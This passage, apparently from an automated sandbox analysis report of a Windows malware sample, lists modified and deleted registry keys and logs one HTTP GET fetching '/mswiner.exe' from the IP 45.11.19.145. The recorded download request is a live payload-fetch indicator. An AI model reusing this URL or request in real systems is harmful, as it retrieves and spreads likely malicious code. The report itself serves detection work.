  1217. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
  1218. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
  1219. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting"
  1220.  
  1221.  
  1222. * Deleted Registry Keys:
  1223. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\78",
  1224. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\)+",
  1225. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  1226. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  1227. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  1228. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  1229. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
  1230. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey",
  1231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  1232. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  1233. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  1234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  1235.  
  1236.  
  1237. * DNS Communications:
  1238.  
  1239. * Domains:
  1240.  
  1241. * Network Communication - ICMP:
  1242.  
  1243. * Network Communication - HTTP:
  1244.  
  1245. "count": 1,
  1246. "body": "",
  1247. "uri": "http://45.11.19.145/mswiner.exe",
  1248. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1249. "method": "GET",
  1250. "host": "45.11.19.145",
  1251. "version": "1.1",
  1252. "path": "/mswiner.exe",
  1253. "data": "GET /mswiner.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 45.11.19.145\r\nConnection: Keep-Alive\r\n\r\n",
  1254. "port": 80
  1255.  
  1256.  
  1257.  
  1258. * Network Communication - SMTP:
  1259.  
  1260. * Network Communication - Hosts:
  1261.  
  1262. "country_name": "unknown",
  1263. "ip": "45.11.19.145",
  1264. "inaddrarpa": "",
  1265. "hostname": ""
  1266.  
  1267.  
  1268.  
  1269. * Network Communication - IRC: